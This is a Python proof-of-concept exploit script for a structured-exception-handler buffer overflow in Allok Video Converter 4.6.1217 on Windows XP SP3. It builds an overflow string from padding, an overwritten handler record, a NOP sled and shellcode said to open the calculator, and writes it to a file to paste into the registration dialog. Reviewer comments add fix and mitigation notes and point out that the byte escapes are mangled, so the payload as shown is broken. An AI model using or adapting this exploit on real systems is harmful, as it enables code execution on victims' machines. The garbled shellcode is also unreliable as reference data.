# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Video Converter
# Vendor Homepage: http://www.alloksoft.com
# Version: 4.6.1217
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the vulnerability
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_vconverter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct

# Proof-of-concept generator: builds a fixed-length string and writes it to
# "exploit.txt", which the header says is pasted into the License Name field.
#
# NOTE(review): the header targets Python 2.7; under Python 3, writing a str
# to a file opened in "wb" mode raises TypeError.
# NOTE(review): the string literals below contain plain "x90"-style text
# rather than escaped bytes, which looks like an extraction artifact. The
# lengths computed from this listing therefore do not match the original PoC,
# so do not derive detection signatures or offsets from this copy alone.
#
# Defensive takeaway (from the header's description): the registration dialog
# accepts a License Name far longer than the buffer that receives it. The fix
# belongs in the vendor code as a length check on that field. Compiler and OS
# mitigations for this bug class (stack cookies, SafeSEH/SEHOP, DEP, ASLR)
# reduce exploitability but do not remove the bug.
file = open("exploit.txt","wb")
# Total length of the generated string; anything after the payload is padding.
buflen = 4000
# Filler that precedes the nseh/seh values.
# presumably the distance to the overwritten record; not verifiable from this page
junk = "A" * 780
# The names nseh/seh suggest the two fields of a structured-exception-handler
# record (next-record pointer, handler pointer) - TODO confirm against the
# original advisory.
nseh = "x90x90xebx10"
# 32-bit little-endian value.
# presumably an address inside a module loaded by the target on the tested XP SP3 system; verify
seh = struct.pack("<L",0x10019A09)
# Padding placed between the seh value and the payload.
nops = "x90" * 20
# The below shellcode will open calculator, but can be modified by need.
# (Author's claim; the bytes are not decodable from this listing as shown.)
shellcode = ""
shellcode +="xbaxd5x31x08x38xdbxcbxd9x74x24xf4x5bx29xc9xb1"
shellcode +="x33x83xc3x04x31x53x0ex03x86x3fxeaxcdxd4xa8x63"
shellcode +="x2dx24x29x14xa7xc1x18x06xd3x82x09x96x97xc6xa1"
shellcode +="x5dxf5xf2x32x13xd2xf5xf3x9ex04x38x03x2fx89x96"
shellcode +="xc7x31x75xe4x1bx92x44x27x6exd3x81x55x81x81x5a"
shellcode +="x12x30x36xeex66x89x37x20xedxb1x4fx45x31x45xfa"
shellcode +="x44x61xf6x71x0ex99x7cxddxafx98x51x3dx93xd3xde"
shellcode +="xf6x67xe2x36xc7x88xd5x76x84xb6xdax7axd4xffxdc"
shellcode +="x64xa3x0bx1fx18xb4xcfx62xc6x31xd2xc4x8dxe2x36"
shellcode +="xf5x42x74xbcxf9x2fxf2x9ax1dxb1xd7x90x19x3axd6"
shellcode +="x76xa8x78xfdx52xf1xdbx9cxc3x5fx8dxa1x14x07x72"
shellcode +="x04x5exa5x67x3ex3dxa3x76xb2x3bx8ax79xccx43xbc"
shellcode +="x11xfdxc8x53x65x02x1bx10x99x48x06x30x32x15xd2"
shellcode +="x01x5fxa6x08x45x66x25xb9x35x9dx35xc8x30xd9xf1"
shellcode +="x20x48x72x94x46xffx73xbdx24x9exe7x5dx85x05x80"
shellcode +="xc4xd9"
# Concatenate the pieces in order: filler, nseh, seh, padding, payload.
exploit = junk + nseh + seh + nops + shellcode
# Pad with "D" up to buflen. If the assembled string were longer than buflen,
# fillers would be negative and "D" * fillers would be an empty string.
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
# The handle is closed explicitly; there is no with-block, so an exception in
# write() would leave it open until the interpreter exits.
file.write(buf)
file.close()